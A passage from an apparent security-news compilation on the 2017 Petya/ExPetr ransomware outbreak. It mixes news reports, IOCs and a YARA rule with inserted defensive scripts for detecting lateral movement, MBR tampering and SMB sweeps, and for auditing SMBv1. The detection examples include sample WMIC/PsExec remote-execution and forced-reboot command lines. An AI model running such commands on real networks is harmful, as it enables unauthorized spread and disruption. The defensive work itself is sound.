The malware waits 10-60 minutes after infection before rebooting the system. The reboot is scheduled using system facilities: the "at" or "schtasks" tools together with "shutdown.exe".
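The two behaviours just described, remote execution through WMIC or PsExec with stolen credentials and a reboot scheduled with at/schtasks and shutdown.exe, both leave process-creation events behind. The following added example (not Kaspersky's code) triages constructed process-creation records with regular expressions for those command lines and flags hosts that show both; the sample command lines, host names and payload path are constructed for illustration, not the ransomware's actual ones.

```python
import re
from collections import defaultdict

# Rules keyed to the behaviour described above; each regex runs over the full command line.
RULES = [
    ("wmic-remote-exec",
     re.compile(r"\bwmic(\.exe)?\b.*\s/node:\S+.*\bprocess\s+call\s+create\b", re.I)),
    ("psexec-remote-exec",
     re.compile(r"\bpsexec(\.exe)?\b.*\\\\\S+", re.I)),
    ("scheduled-reboot",
     re.compile(r"\b(schtasks|at)(\.exe)?\b.*\bshutdown(\.exe)?\b.*\s/r\b", re.I)),
    ("reboot",
     re.compile(r"\bshutdown(\.exe)?\b.*\s/r\b", re.I)),
]

# Constructed process-creation records (time, host, parent image, command line).
# Illustrative only; payload.dll and the addresses are placeholders.
SAMPLE_PROCESS_EVENTS = [
    ("2017-06-27T11:02:01", "WS-014", "rundll32.exe",
     'C:\\Windows\\System32\\wbem\\wmic.exe /node:"10.0.0.21" /user:"CORP\\svc_admin" '
     '/password:"***" process call create "C:\\Windows\\System32\\rundll32.exe C:\\Windows\\payload.dll,#1"'),
    ("2017-06-27T11:02:04", "WS-014", "rundll32.exe",
     'C:\\Windows\\psexec.exe \\\\10.0.0.22 -accepteula -s -d '
     'C:\\Windows\\System32\\rundll32.exe C:\\Windows\\payload.dll,#1'),
    ("2017-06-27T11:02:09", "WS-014", "rundll32.exe",
     'C:\\Windows\\System32\\schtasks.exe /Create /SC once /TN "" '
     '/TR "C:\\Windows\\system32\\shutdown.exe /r /f" /ST 11:55'),
    ("2017-06-27T11:03:30", "WS-021", "cmd.exe",
     "C:\\Windows\\System32\\wbem\\wmic.exe os get caption"),
    ("2017-06-27T11:04:00", "WS-021", "explorer.exe",
     "C:\\Windows\\System32\\notepad.exe"),
]


def match_rules(cmdline: str):
    """First rule name that matches the command line, or None."""
    for name, rx in RULES:
        if rx.search(cmdline):
            return name
    return None


def triage(events):
    """Per-event matches, plus hosts that show remote execution AND a reboot."""
    matches = []
    for _, host, _, cmd in events:
        name = match_rules(cmd)
        if name:
            matches.append((host, name))
    per_host = defaultdict(set)
    for host, name in matches:
        per_host[host].add(name)
    suspicious = sorted(h for h, names in per_host.items()
                        if names & {"wmic-remote-exec", "psexec-remote-exec"}
                        and names & {"scheduled-reboot", "reboot"})
    return matches, suspicious


if __name__ == "__main__":
    print(triage(SAMPLE_PROCESS_EVENTS))
```

Sysmon event 1 or Windows 4688 with command-line auditing enabled supplies these records; the "reboot" rule alone is noisy on servers, which is why the host-level verdict requires the remote-execution half as well.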
 

Once the system reboots, the malware starts encrypting the MFT (Master File Table) of the NTFS partitions, the MBR having been overwritten with a customized loader that displays a ransom note. More details on the ransom note below.
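Both this paragraph and the Novinky article earlier on this page describe the MBR being overwritten with the ransomware's own loader. The following added example (not Kaspersky's code) shows the check a responder can make against a disk image: parse the 512-byte sector, verify the 0x55AA signature and the partition table, and compare the boot-code hash with a baseline taken earlier. The sectors below are constructed test data, not images of an infected machine.

```python
import hashlib
import struct

SECTOR = 512
BOOT_CODE_LEN = 446            # boot code precedes the 4 x 16-byte partition table
BOOT_SIGNATURE = b"\x55\xAA"   # bytes 510-511 of a valid MBR


def parse_mbr(sector: bytes) -> dict:
    """Split an MBR into boot-code hash, partition entries and signature flag."""
    if len(sector) != SECTOR:
        raise ValueError("expected one 512-byte sector")
    partitions = []
    for i in range(4):
        # status(1) CHS-start(3) type(1) CHS-end(3) LBA-start(4) LBA-count(4)
        status, ptype, lba_start, lba_count = struct.unpack_from(
            "<B3xB3xII", sector, BOOT_CODE_LEN + 16 * i)
        if ptype != 0:
            partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "lba_count": lba_count})
    return {"boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
            "partitions": partitions,
            "signature_ok": sector[510:512] == BOOT_SIGNATURE}


def compare_with_baseline(baseline: bytes, current: bytes) -> list:
    """Findings a responder cares about: missing signature, changed boot code,
    changed partition table. An empty list means the MBR matches the baseline."""
    base, cur = parse_mbr(baseline), parse_mbr(current)
    findings = []
    if not cur["signature_ok"]:
        findings.append("boot signature 0x55AA missing")
    if cur["boot_code_sha256"] != base["boot_code_sha256"]:
        findings.append("boot code differs from baseline")
    if cur["partitions"] != base["partitions"]:
        findings.append("partition table differs from baseline")
    return findings


def make_sector(boot_code: bytes, partitions) -> bytes:
    """Build a constructed MBR for testing (no real disk image is read)."""
    table = b"".join(struct.pack("<B3xB3xII", 0x80 if boot else 0x00, ptype, start, count)
                     for boot, ptype, start, count in partitions).ljust(64, b"\x00")
    return boot_code.ljust(BOOT_CODE_LEN, b"\x00") + table + BOOT_SIGNATURE


NTFS_LAYOUT = [(True, 0x07, 2048, 204800)]                     # one bootable NTFS partition
BASELINE_MBR = make_sector(b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c", NTFS_LAYOUT)
# Same partition table, but the boot code has been replaced by a foreign loader.
TAMPERED_MBR = make_sector(b"\xeb\x00" + b"CONSTRUCTED LOADER".ljust(400, b"\x90"), NTFS_LAYOUT)


if __name__ == "__main__":
    print(compare_with_baseline(BASELINE_MBR, TAMPERED_MBR))
```

Reading the first sector of a physical disk is one call away (open the raw device and read 512 bytes), so the baseline hash is cheap to record during build and cheap to re-check on a schedule; a changed boot code with an unchanged partition table is exactly the shape of a bootkit or an MBR-locking ransomware.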

Network survey

The malware enumerates all network adapters, all known server names via NetBIOS and also retrieves the list of current DHCP leases, if available. Each and every IP on the local network and each server found is checked for open TCP ports 445 and 139. Those machines that have these ports open are then attacked with one of the methods described above.
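The sweep described here (and the ARP/SMB scan that Check Point describes in the Czech article earlier on this page) is visible in flow data as one host touching many neighbours on ports 445 and 139 within a short time. The following added example (not Kaspersky's code) detects that over constructed NetFlow-like records; the window and threshold are assumptions to tune for the environment, and the addresses are made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta

SMB_PORTS = {445, 139}
WINDOW = timedelta(minutes=2)      # assumption: tune to the network
MIN_TARGETS = 5                    # assumption: distinct SMB targets inside one window


def build_sample_flows():
    """Constructed NetFlow-like records (time, src, dst, dport); not real traffic."""
    t0 = datetime(2017, 6, 27, 11, 3, 0)
    flows = []
    for i in range(1, 13):                                   # one host sweeps 12 neighbours
        flows.append((t0 + timedelta(seconds=5 * i), "10.0.0.14", f"10.0.0.{i}", 445))
        flows.append((t0 + timedelta(seconds=5 * i + 1), "10.0.0.14", f"10.0.0.{i}", 139))
    for i in range(20):                                      # a normal client and its file server
        flows.append((t0 + timedelta(seconds=30 * i), "10.0.0.5", "10.0.0.200", 445))
    flows.append((t0 + timedelta(seconds=70), "10.0.0.14", "10.0.0.200", 80))   # not SMB
    return sorted(flows)


def detect_smb_sweeps(flows, window=WINDOW, min_targets=MIN_TARGETS):
    """Return {src: largest number of distinct SMB targets seen inside any window}
    for sources that reach `min_targets`; a sliding window runs per source."""
    by_src = defaultdict(list)
    for ts, src, dst, dport in flows:
        if dport in SMB_PORTS:
            by_src[src].append((ts, dst))
    alerts = {}
    for src, items in by_src.items():
        items.sort()
        start = 0
        for end, (ts, _) in enumerate(items):
            while ts - items[start][0] > window:
                start += 1
            targets = {dst for _, dst in items[start:end + 1]}
            if len(targets) >= min_targets:
                alerts[src] = max(alerts.get(src, 0), len(targets))
    return alerts


if __name__ == "__main__":
    print(detect_smb_sweeps(build_sample_flows()))
```

Domain controllers and backup servers legitimately talk SMB to many hosts, so in practice the rule needs an allow-list of such sources; a workstation reaching a dozen peers on 445 in a minute is what the text above describes and is rarely benign.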

Password extraction

Resources 1 and 2 of the malware binary contain two versions (32-bit and 64-bit) of a standalone tool that tries to extract the logins and passwords of logged-on users. The tool is run by the main binary. All extracted data is transferred back to the main module via a named pipe with a random GUID-like name.

File Decryption

Are there any hopes of decrypting files for victims already infected? Unfortunately, the ransomware uses a standard, solid encryption scheme so this appears unlikely unless a subtle implementation mistake has been made. The following specifics apply to the encryption mechanism:

For all files, one AES-128 key is generated.
This AES key is encrypted with threat actors’ public RSA-2048 key.
Encrypted AES keys are saved to a README file.
Keys are securely generated.
The criminals behind this attack are asking for $300 in Bitcoin to deliver the key that decrypts the ransomed data, payable to a single Bitcoin wallet. Unlike WannaCry, this scheme could work because the attackers ask victims to send their wallet numbers by e-mail to "wowsmith123456@posteo.net", thus confirming the transactions. We have seen reports that this e-mail account has already been shut down, effectively making the full decryption chain for existing victims impossible at this time.
 

At the time of writing, the Bitcoin wallet has accrued 24 transactions totalling 2.54 BTC or just under $6,000 USD.

Here’s our shortlist of recommendations on how to survive ransomware attacks:

Run a robust anti-malware suite with embedded anti-ransomware protection such as System Watcher from Kaspersky Internet Security.
Make sure you update Microsoft Windows and all third party software. It’s crucial to apply the MS17-010 bulletin immediately.
Do not open attachments from untrusted sources.
Backup sensitive data to external storage and keep it offline.
For sysadmins, our products detect the samples used in the attack by these verdicts:

Trojan-Ransom.Win32.PetrWrap.d
HEUR:Trojan-Ransom.Win32.PetrWrap.d
PDM:Trojan.Win32.Generic
UDS:DangerousObject.Multi.Generic
Intrusion.Win.MS17-010.e
IOCs

71B6A493388E7D0B40C83CE903BC6B04
0df7179693755b810403a972f4466afb
42b2ff216d14c2c8387c8eabfb1ab7d0
E595c02185d8e12be347915865270cca
e285b6ce047015943e685e6638bd837e

Yara rules

rule ransomware_PetrWrap {
    meta:
        copyright = "Kaspersky Lab"
        description = "Rule to detect PetrWrap ransomware samples"
        last_modified = "2017-06-27"
        author = "Kaspersky Lab"
        hash = "71B6A493388E7D0B40C83CE903BC6B04"
        version = "1.0"

    strings:
        $a1 = "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu" fullword wide
        $a2 = ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls" fullword wide
        $a3 = "DESTROY ALL OF YOUR DATA! PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED" fullword ascii
        $a4 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" fullword ascii
        $a5 = "wowsmith123456@posteo.net." fullword wide

    condition:
        uint16(0) == 0x5A4D and
        filesize < 1000000 and any of them
}


A new global ransomware epidemic, this time threatening the Czech Republic as well

28.6.2017 SecurityWorld Viruses
The new extortion malware attacks mainly larger companies: the banking sector and energy and postal companies are at risk.

According to Eset, Ukraine, for example, is reporting extraordinary IT outages in the banking sector, in the energy distribution networks and at postal companies.

The significantly affected countries include Italy, Israel and Serbia, but also the countries of Central and Eastern Europe including the Czech Republic, which at the peak of the infection was ninth in the ranking of the most affected states.

The extent of the damage caused by the new type of ransomware has not yet been confirmed; yesterday experts recorded no reports of power outages of the kind previously caused by the infamous Industroyer malware.

The attack is by no means concentrated on a few selected countries: Spain and India are affected too, and the Danish shipping company Maersk and the British advertising company WPP are reporting major problems.

"The new ransomware resembles the well-known malicious code Petya. If it manages to infiltrate the MBR (Master Boot Record), the computer's main boot record, it encrypts the whole disk. Otherwise it encrypts individual files, just like the Mischa ransomware," says Robert Lipovský, an analyst at Eset. The code's authors demand a payment of 300 dollars from their victims; otherwise they will not decrypt the affected devices.

Experts at Check Point also confirm the probable similarity to the Petya ransomware, which, instead of encrypting individual files, encrypts the whole hard disk at once.

Check Point says it has found the involvement of the Loki bot, which was used to steal credentials. "Our analysis confirmed that the ransomware exploits SMB vulnerabilities to spread," says Daniel Šafář of Check Point.

Eset confirms this too: according to it, the new ransomware spreads through a combination of the SMB exploit that the infamous WannaCry ransomware also used, whose attack hit some 200,000 computers more than a month ago, and the PsExec program, a tool for remotely installing and running arbitrary applications.

"This dangerous combination may be the reason why this epidemic is spreading so quickly around the world, even after the previous WannaCry attack widely publicized the ransomware problem and most of the vulnerabilities have already been patched," explains Lipovský.

According to him, the malicious code only needs to infect a single computer to get into the corporate network, where the malware can then obtain administrator rights and spread to other computers.


Israeli Spy Agency Creates Fund to Invest in Tech Firms

28.6.2017 securityweek BigBrothers
Israel's Mossad spy agency is starting a fund to invest in technology firms creating products that could assist its work, including those involving robotics and encryption, the prime minister's office said Tuesday.

The fund, to be called Libertad, will invest in research and development programs at "cutting-edge technology startup companies," a statement said.

It said it was calling on firms to submit proposals, particularly in areas including robotics, encryption and personality profiling.

The statement said Mossad would not publicise the names of the firms in which it invests.

It said Libertad would be open to anyone and provided an email address to submit proposals (apply@libertad.gov.il), adding that it would offer up to two million shekels ($570,000, 500,000 euros) for projects.

More could be granted for exceptional cases, it said.

It will not act as a typical investor.

Libertad will not hold equity in the firms in which it invests and will instead receive a license to use the technology developed, it said.

The CIA in the United States has created a similar investment fund, known as In-Q-Tel.

Israel is seen as a global leader in the technology industry, particularly regarding cyber-defense.

Libertad was the name of a ship that carried Jewish emigrants to what was then British-mandate Palestine in 1940 before the creation of the state of Israel.


Google's $2.73 Billion Fine Demonstrates Importance of GDPR Compliance

27.6.2017 securityweek Privacy
The European Commission (EC) has levied a €2.42 billion ($2.73 billion) fine against Google because it "has abused its market dominance as a search engine by giving an illegal advantage to another Google product, its comparison shopping service."

While this is an antitrust action, it raises the possibility of similarly large fines under the General Data Protection Regulation coming into force in less than a year's time. That new regulation can set sanctions at up to 4% of a firm's annual global turnover. While this would rarely reach the level of today's fine against Google in absolute terms, it provides the potential for proportionately similar fines against a far larger number of companies than those that might be caught by antitrust regulations.

Today's fine was levied because the EC concluded that firstly, "Google is dominant in general internet search markets throughout the European Economic Area;" and that secondly, "Google has abused this market dominance by giving its own comparison shopping service an illegal advantage."

Google can, and almost certainly will, appeal the decision. In a statement emailed to SecurityWeek, Kent Walker, SVP and General Counsel, commented, "When you shop online, you want to find the products you're looking for quickly and easily. And advertisers want to promote those same products. That's why Google shows shopping ads, connecting our users with thousands of advertisers, large and small, in ways that are useful for both. We respectfully disagree with the conclusions announced today. We will review the Commission's decision in detail as we consider an appeal, and we look forward to continuing to make our case."

The level of the fine was calculated on the basis of a specified formula. "The Commission's fine of €2,424,495,000," explains the EC announcement, "takes account of the duration and gravity of the infringement. In accordance with the Commission's 2006 Guidelines on fines... the fine has been calculated on the basis of the value of Google's revenue from its comparison shopping service in the 13 EEA countries concerned."

It is this use of a known formula that allows us to speculate on any future GDPR fines (for any infringer and not just Google). "Does this case give us any entree as to how the Commission might behave in setting fines when GDPR is in force?" asks Brian Bandey, a Doctor of Law specializing in International IP and cyber issues. "Well we can say that the Commission followed its 2006 'Guidelines on the method of setting fines' with respect to Google."

When they came into force, competition commissioner Neelie Kroes said about them: "These revised Guidelines will better reflect the overall economic significance of the infringement... the link between the fine and the duration of the infringement, and the increase for repeat offenders -- send three clear signals to companies. Don't break the anti-trust rules; if you do, stop it as quickly as possible, and once you've stopped, don't do it again."

Bandey continues, "My personal expectation is that the same approach will be taken with respect to GDPR fines. The EU States hold the concept of individual personalty and their consequent rights very highly. In a sense, that is the moving force behind the GDPR. In the European Commission Fact Sheet on this subject (24th May 2017): 'The reform provides tools for gaining control of one's personal data, the protection of which is a fundamental right in the European Union.'

"In that sense," he adds, "I expect that they will link penalties for breaching these 'fundamental rights' to duration, effects on involved persons, and repeat offending." And as Kroes said, it would be best for companies who breach GDPR to stop as quickly as possible, and not breach it again.

Not everyone thinks that this anti-trust fine will provide a benchmark for future GDPR fines. Dr Monica Horten, a visiting fellow at the London School of Economics, stresses the fundamental difference between the laws. "With this Google fine," she said, "this is a corporation abusing its dominant market position. The underlying motivation is about deliberately seeking to gain market advantage, and simultaneously disadvantaging its competitors. It was a deliberate, proactive move to cut out competition.

"GDPR fines," she continued, "will be imposed by national regulators responsible for data protection in Member States. The GDPR gives national regulators a range of measures they can take before they resort to a fine. With GDPR, the root is more likely to lie in some form of corporate management failure, either through neglect or making false economies and cost-cutting." The implication is that the regulators will be slow to deliver the full force of the regulation.

But that doesn't mean that companies can afford to relax concern about GDPR. With this fine, explains David Flint, senior partner at law firm MacRoberts LLP, "the Commission has sent out a clear signal that it is not afraid to take on the largest entities who it perceives to be breaching EU law. With the introduction of the GDPR next year and its potential for penalties of up to 4% of worldwide turnover, there can be little doubt that US businesses need to take compliance with EU law, be it Data Protection or Antitrust, very seriously.

"Both the GDPR and the Antitrust rules envisage follow-on private actions for damages, so the potential risk, legal, financial and reputational may be significantly higher."

"But let me be absolutely clear," adds Bandey; "nobody really knows. But we will do in the not-so-distant future."


A new massive attack allegedly based on Petwrap #ransomware hits organizations in several states
27.6.2017 securityaffairs Ransomware
A new wave of cyber attacks is shocking the IT industry, a massive attack leveraging the Petwrap ransomware has infected systems across the world.
A few weeks after the massive WannaCry attack, security experts are facing a new threat that is spreading rapidly.

Once again, ransomware is infecting computers worldwide and causing chaos: systems at banks, power suppliers and businesses in Europe, Russia, Ukraine and India have been hit by Petwrap.

The Petwrap ransomware is a variant of the notorious Petya ransomware; it encrypts files and demands $300 in Bitcoin from its victims.

Like WannaCry, Petwrap exploits the Windows SMBv1 vulnerability, and its large-scale effects highlight the poor security posture of computers worldwide.

According to security researcher Matt Suiche, founder of the cyber security firm Comae Technologies, the malware uses the same attack vector exploited by EternalBlue and the accompanying DoublePulsar rootkit.


Matthieu Suiche @msuiche
Petya builds SMBv1 headers in its code. This smells like ETERNALBLUE/DOUBLEPULSAR all over again. Will confirm shortly.
4:34 PM - 27 Jun 2017
Unlike other ransomware, Petya does not encrypt files on the infected systems but targets the hard drive’s master file table (MFT) and renders the master boot record (MBR) inoperable.

Petya locks the access to the users’ data by encrypting the master file table (MFT) and replaces the computer’s MBR with its own malicious code that displays the ransom note.

Petya overwrites the MBR of the hard drive, causing Windows to crash. When the victim tries to reboot the PC, it is impossible to load the OS, even in Safe Mode.

Below is the ransom note displayed by the Petwrap ransomware:

“If you see this text, then your files are no longer accessible, because they are encrypted. Perhaps you are busy looking for a way to recover your files, but don’t waste your time. Nobody can recover your files without our decryption service.”


More bad news: currently only a small fraction of antivirus engines detect the threat. According to VirusTotal, only 15 out of 61 anti-virus services are able to detect Petwrap.

News of attacks on financial institutions is circulating on the internet; the National Bank of Ukraine (NBU) is one of the victims of the ransomware.

The Petwrap ransomware has infected systems at the Russian state-owned oil company Rosneft, while the Ukrainian state electricity suppliers "Kyivenergo" and "Ukrenergo" were also targeted by the malware.

“We were attacked. Two hours ago, we had to turn off all our computers. We are waiting for permission from Ukraine’s Security Service (SBU) to switch them back on,” Kyivenergo’s press service said.

Many systems were infected in Ukraine: the Ukrainian branch of the mining company Evraz also confirmed infections, along with Ukraine's local metro and Kiev's Boryspil Airport.


Kyiv Metro Alerts @kyivmetroalerts
Friends! Payment by bank card is currently not possible.
Hacker attack. https://ain.ua/2017/06/27/kievenergo-i-ukrainskie-banki-podverglis-xakerskoj-atake …
2:00 PM - 27 Jun 2017
The logistics giant Maersk was also seriously hit by the malware.


Maersk @Maersk
2:35 PM - 27 Jun 2017
At least three Ukrainian telecommunication operators, LifeCell, Kyivstar and Ukrtelecom, have also reported Petwrap ransomware infections.

While I was writing, different opinions about the threat were circulating on the Internet.

Kaspersky Lab malware analyst Vyacheslav Zakorzhevsky declared that the infections were traced to a "new ransomware we haven't seen before." Stay tuned.


Petya Ransomware Spreading Rapidly Worldwide, Just Like WannaCry
27.6.2017 thehackernews Ransomware

Watch out, readers! It is ransomware, another WannaCry, another wide-spread attack.
The WannaCry ransomware is not dead yet, and another large-scale ransomware attack is causing chaos worldwide, shutting down computers at corporations, power suppliers and banks across Russia, Ukraine, Spain, France, the UK, India and the rest of Europe, and demanding $300 in Bitcoin.
According to multiple sources, a new variant of the Petya ransomware, also known as Petwrap, is spreading rapidly with the help of the same Windows SMBv1 vulnerability that the WannaCry ransomware abused to infect 300,000 systems and servers worldwide in just 72 hours.
Petya is a nasty piece of ransomware and works very differently from other ransomware. Unlike traditional ransomware, Petya does not encrypt files on a targeted system one by one.
Instead, Petya reboots the victim's computer and encrypts the hard drive's master file table (MFT), rendering the master boot record (MBR) inoperable and restricting access to the whole system by seizing the information about file names, sizes and locations on the physical disk.
Petya replaces the computer's MBR with its own malicious code, which displays the ransom note and leaves the computer unable to boot.
Petya! Petya! Another Worldwide Ransomware Attack

Screenshots of the latest Petya infection shared on Twitter show that the ransomware displays a text demanding $300 worth of Bitcoin. Here's what the text reads:
"If you see this text, then your files are no longer accessible, because they are encrypted. Perhaps you are busy looking for a way to recover your files, but don't waste your time. Nobody can recover your files without our decryption service."
According to a recent VirusTotal scan, currently, only 13 out of 61 anti-virus services are successfully detecting the Petya virus.
Affected Power Companies:
In the past few hours, the Petya ransomware has already infected the Russian state-owned oil giant Rosneft and the Ukrainian state electricity suppliers "Kyivenergo" and "Ukrenergo."
"We were attacked. Two hours ago, we had to turn off all our computers. We are waiting for permission from Ukraine's Security Service (SBU) to switch them back on," Kyivenergo's press service said.
Affected Banks and Financial Institutions:
There are reports from several banks, including the National Bank of Ukraine (NBU) and Oschadbank, and from companies, that they have been hit by the Petya ransomware attacks.
Affected Businesses:

Maersk, an international logistics company, has also confirmed on Twitter that the latest Petya attacks have shut down its IT systems at multiple locations and business units.
"We can confirm that Maersk IT systems are down across multiple sites and business units. We are currently assessing the situation. The safety of our employees, our operations and customers' business is our top priority. We will update when we have more information," the company said.
The ransomware also hit multiple workstations at the Ukrainian branch of the mining company Evraz.
The most severe damages reported by Ukrainian businesses also include compromised systems at Ukraine's local metro, and Kiev's Boryspil Airport.
Affected Telecommunication Industry:
Three Ukrainian telecommunication operators, Kyivstar, LifeCell and Ukrtelecom, were also affected by the latest Petya attack.
Petya Victims Are Paying for Unlocking Files

At the time of writing, 9 victims have paid in Bitcoin to '1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX' address for decrypting their files infected by Petya, which total roughly $2700.
How Is Petya Ransomware Spreading So Fast?
So far it is not confirmed what is behind the sudden rapid spread of Petya, but security researchers on Twitter argue that, like WannaCry, Petya is also using the SMBv1 EternalBlue exploit and taking advantage of unpatched Windows machines.
"Petya ransomware successful in spreading because it combines both a client-side attack (CVE-2017-0199) and a network based threat (MS17-010)," tweeted security researcher HackerFantastic.
EternalBlue is a Windows SMB exploit leaked by the infamous hacking group Shadow Brokers in its April data dump, along with other Windows exploits, which the group claimed to have stolen from the US intelligence agency NSA.
Microsoft has since patched the vulnerability for all versions of Windows operating systems, but many users remain vulnerable, and a string of malware variants are exploiting the flaw to deliver ransomware and mine cryptocurrency.
Just three days ago, we reported about the latest WannaCry attacks that hit Honda Motor Company and around 55 speed and traffic light cameras in Japan and Australia, respectively.
Well, it is quite surprising that even after knowing about the WannaCry issue for a decent amount of time, big corporations and companies have not yet implemented proper security measures to defend against the threat.
How to Protect Yourself from Ransomware attack
What to do immediately? Go and apply those goddamn patches against EternalBlue (MS17-010) and disable the unsecured, 30-year-old SMBv1 file-sharing protocol on your Windows systems and servers.
To safeguard against any ransomware infection, you should always be suspicious of unwanted files and documents sent over email and should never click on links inside them without verifying the source.
To always keep a tight grip on your valuable data, keep a good backup routine in place that copies it to an external storage device that isn't always connected to your PC.
Moreover, make sure that you run a good and effective anti-virus security suite on your system, and keep it up-to-date. Most importantly, always browse the Internet safely.
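The two host-level steps above (confirm the MS17-010 patch is installed, disable SMBv1) can be audited and applied from an elevated PowerShell prompt. The script below is an added example for this page, not code from the article or from Microsoft. It assumes the KB identifiers published in the MS17-010 bulletin (listed in the script; later cumulative updates on Windows 10 supersede them, so a missing KB there is a hint, not proof of exposure) and uses only standard cmdlets; `Get-SmbServerConfiguration` exists on Windows 8 / Server 2012 and later, so the script falls back to the registry value on older builds.

```powershell
# Added example (not from the article): audit a Windows host for the MS17-010
# patch and the SMBv1 state that the text recommends fixing, then disable SMBv1.
# Run from an elevated PowerShell prompt (Windows 7 / Server 2008 R2 and later).

# Hotfix ids from the MS17-010 bulletin (March 2017). On Windows 10 these are
# superseded by later cumulative updates, so "not found" there is only a hint.
$Ms17010Kbs = @(
    'KB4012212', 'KB4012215',   # Windows 7 SP1 / Server 2008 R2 (security-only / monthly rollup)
    'KB4012213', 'KB4012216',   # Windows 8.1 / Server 2012 R2
    'KB4012214', 'KB4012217',   # Server 2012
    'KB4012606',                # Windows 10 1507
    'KB4013198',                # Windows 10 1511
    'KB4013429',                # Windows 10 1607
    'KB4012598'                 # Vista / Server 2008, and the out-of-band XP / Server 2003 fix
)

function Test-Ms17010Patch {
    # Returns the MS17-010 hotfix ids installed on this host (empty array if none).
    $installed = Get-HotFix -ErrorAction SilentlyContinue | Select-Object -ExpandProperty HotFixID
    return @($installed | Where-Object { $Ms17010Kbs -contains $_ })
}

function Get-Smb1State {
    # Server side: is the SMB1 dialect still offered?
    $server = $null
    if (Get-Command Get-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        $server = (Get-SmbServerConfiguration).EnableSMB1Protocol
    }
    # Windows 8 / 10: is the SMB1Protocol optional component installed at all?
    $feature = $null
    if (Get-Command Get-WindowsOptionalFeature -ErrorAction SilentlyContinue) {
        $f = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -ErrorAction SilentlyContinue
        if ($f) { $feature = $f.State }
    }
    # Registry switch honoured by the LanmanServer service (absent means enabled).
    $reg = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' `
                            -Name SMB1 -ErrorAction SilentlyContinue
    [pscustomobject]@{
        ServerEnableSMB1 = $server
        OptionalFeature  = $feature
        RegistrySMB1     = $(if ($reg) { $reg.SMB1 } else { 'not set (defaults to enabled)' })
    }
}

function Disable-Smb1 {
    # Server side takes effect immediately; removing the optional component needs a reboot.
    if (Get-Command Set-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    } else {
        Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' `
                         -Name SMB1 -Type DWORD -Value 0 -Force
    }
    if (Get-Command Disable-WindowsOptionalFeature -ErrorAction SilentlyContinue) {
        Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart
    }
}

$patches = Test-Ms17010Patch
if ($patches.Count -gt 0) { "MS17-010 hotfix present: $($patches -join ', ')" }
else { "No March-2017 MS17-010 hotfix id found; verify that a later cumulative update is installed" }
Get-Smb1State | Format-List

# Uncomment to remediate once the audit output has been reviewed:
# Disable-Smb1
```

Disabling SMBv1 on the server side closes the path the text describes, but file servers still reached by legacy clients (old NAS firmware, Windows XP) will stop serving them, so check `Get-SmbSession` for SMB1 dialects before running `Disable-Smb1` fleet-wide.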


Petya Ransomware Outbreak Hits Organizations Globally

27.6.2017 securityweek Ransomware
Organizations worldwide are currently under a cyber-attack involving the year-old Petya ransomware, security experts report.

The attack has already hit Ukraine's central bank and the Russian oil giant Rosneft. Government computers, airports and large communication companies in Ukraine appear to have been affected as well. The US biopharmaceutical giant Merck has also confirmed that its network was compromised as part of the global attack.

Allan Liska, Intelligence Architect at Recorded Future, told SecurityWeek in an emailed statement that Spain and France were also hit and that the first victims in the United States have started to emerge. Other security researchers observed attacks in the UK and India and expect the outbreak to spread to other countries too.

Mikko Hypponen @mikko
There are now reports of Petya from Ukraine, Russia, UK, India. Business day starting in USA right now... https://twitter.com/ankit5934/status/879681380686340096 …
4:04 PM - 27 Jun 2017

The massive spread comes only a month and a half after WannaCry affected hundreds of thousands of computers worldwide, spreading via an NSA-linked SMB exploit called EternalBlue. According to the security company Avira, the currently unfolding attack is using the same exploit to spread like wildfire.

AlienVault also mentions the use of the EternalBlue exploit, but notes that no confirmation of this has emerged as of now. The company reveals that the ransomware "leverages ARP scans and PsExec to spread. PsExec is dropped as dllhost.dat."

Petya was initially spotted in March last year, when it stood out from the crowd because it wasn't targeting individual files, as most ransomware families do, but the Master Boot Record instead, thus completely cutting users' access to the infected computers.

The malware was observed performing a two-step encryption process: it would first cause a PC crash with a BSOD and prompt for a reboot, and would manipulate the MBR during the boot-up sequence. Thus, users could avoid having their hard drives encrypted by preventing the computer from rebooting.
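What "manipulating the MBR" means in practice, and how a defender can notice it, is easier to see on the sector layout itself. The script below is an added example for this page (not code from the article or from any vendor): it parses a 512-byte MBR, hashes the 446-byte bootstrap area, and compares it to a baseline recorded on a clean host, so an overwritten bootstrap of the kind described in this article and in the two articles above shows up as a hash mismatch or a missing 0x55AA signature. The sample sector is constructed inline and is not a real disk image; the function names are this example's own.

```powershell
# Added example (not from the article): parse an MBR sector and detect bootstrap
# tampering by comparing the boot code hash with a known-good baseline.

function ConvertTo-Hex([byte[]]$Bytes) {
    # Lower-case hex string for a byte array
    return (($Bytes | ForEach-Object { $_.ToString('x2') }) -join '')
}

function Get-MbrInfo {
    param([Parameter(Mandatory)][byte[]]$Sector)
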